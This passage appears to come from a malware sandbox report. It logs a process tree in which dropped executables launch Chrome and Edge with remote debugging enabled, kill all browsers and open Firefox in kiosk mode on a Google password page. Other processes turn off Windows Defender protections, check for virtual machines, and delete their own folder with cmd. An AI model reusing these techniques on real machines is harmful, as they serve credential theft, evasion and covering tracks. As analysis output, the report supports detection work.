C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2220 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe47f5cc40,0x7ffe47f5cc4c,0x7ffe47f5cc585⤵PID:3472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=288,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1728 /prefetch:25⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1904,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2152 /prefetch:35⤵PID:2372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2256 /prefetch:85⤵PID:4332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:15⤵
- Uses browser remote debugging
PID:4168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:15⤵
- Uses browser remote debugging
PID:3632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:15⤵
- Uses browser remote debugging
PID:3068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:85⤵PID:2260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3616,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3856 /prefetch:85⤵PID:3712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4900,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4804 /prefetch:85⤵PID:5528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4848,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4820 /prefetch:85⤵PID:5748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5044 /prefetch:85⤵PID:5844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4604,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:85⤵PID:5892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5096 /prefetch:85⤵PID:5932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4844 /prefetch:85⤵PID:5460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5056,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:25⤵
- Uses browser remote debugging
PID:6100
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5976 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffe47f646f8,0x7ffe47f64708,0x7ffe47f647185⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:25⤵PID:5364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:5372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:85⤵PID:2916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:15⤵
- Uses browser remote debugging
PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:15⤵
- Uses browser remote debugging
PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:15⤵
- Uses browser remote debugging
PID:5156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:15⤵
- Uses browser remote debugging
PID:5748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ngv37" & exit4⤵
- System Location Discovery: System Language Discovery
PID:7816 -
C:\Windows\SysWOW64\timeout.exetimeout /t 115⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127840101\17df09620c.exe"C:\Users\Admin\AppData\Local\Temp\10127840101\17df09620c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2568 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4452
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127850101\8323f7acef.exe"C:\Users\Admin\AppData\Local\Temp\10127850101\8323f7acef.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5488 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4480
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127860101\787a5f5ef6.exe"C:\Users\Admin\AppData\Local\Temp\10127860101\787a5f5ef6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6008
-
-
C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe"C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe"C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 7884⤵
- Program crash
PID:5312
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127880101\ec6d990530.exe"C:\Users\Admin\AppData\Local\Temp\10127880101\ec6d990530.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7768 -
C:\Users\Admin\AppData\Local\Temp\FR5MVRFWWK6EPYHEW9UM6Y.exe"C:\Users\Admin\AppData\Local\Temp\FR5MVRFWWK6EPYHEW9UM6Y.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5484
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127890101\49afafb5a2.exe"C:\Users\Admin\AppData\Local\Temp\10127890101\49afafb5a2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:8164
-
-
C:\Users\Admin\AppData\Local\Temp\10127900101\ae85dec50f.exe"C:\Users\Admin\AppData\Local\Temp\10127900101\ae85dec50f.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6460 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6424
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6384
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:6412
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6400 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2b700e2-e7b6-4a17-a568-2f05c8ad2470} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" gpu6⤵PID:6532
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {683e45a2-ddef-429b-8827-5d97843d9b58} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" socket6⤵PID:5400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1408 -childID 1 -isForBrowser -prefsHandle 3108 -prefMapHandle 2672 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c9fc7d2-95cd-4dda-95e9-3446da612fd2} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab6⤵PID:7988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2756 -childID 2 -isForBrowser -prefsHandle 3936 -prefMapHandle 3932 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee493899-3a7e-4fcc-be13-8b3a18f4a051} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab6⤵PID:7612
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4656 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4620 -prefMapHandle 4608 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e2c7c48-45e4-455b-ad85-d05d410a0522} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" utility6⤵
- Checks processor information in registry
PID:2032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5184 -childID 3 -isForBrowser -prefsHandle 5160 -prefMapHandle 5172 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {911ec1e8-f885-4008-a46c-2183b5b202b7} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab6⤵PID:5856
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5188 -childID 4 -isForBrowser -prefsHandle 5344 -prefMapHandle 5320 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2310d52f-12bb-49df-9744-83d9d8239507} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab6⤵PID:6780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5420 -childID 5 -isForBrowser -prefsHandle 5160 -prefMapHandle 5352 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf8880d9-81a7-4809-b669-61f98ddc361a} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab6⤵PID:6816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127910101\4135398cf6.exe"C:\Users\Admin\AppData\Local\Temp\10127910101\4135398cf6.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe"C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4236 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:8120 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe57d1cc40,0x7ffe57d1cc4c,0x7ffe57d1cc585⤵PID:6836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2020,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2016 /prefetch:25⤵PID:7216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2068 /prefetch:35⤵PID:2992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2476 /prefetch:85⤵PID:7388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:15⤵
- Uses browser remote debugging
PID:6228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:15⤵
- Uses browser remote debugging
PID:7212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:15⤵
- Uses browser remote debugging
PID:6588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:85⤵PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:85⤵PID:6080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4820 /prefetch:85⤵PID:6656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4968 /prefetch:85⤵PID:7008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4996 /prefetch:85⤵PID:7608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4876 /prefetch:85⤵PID:5236
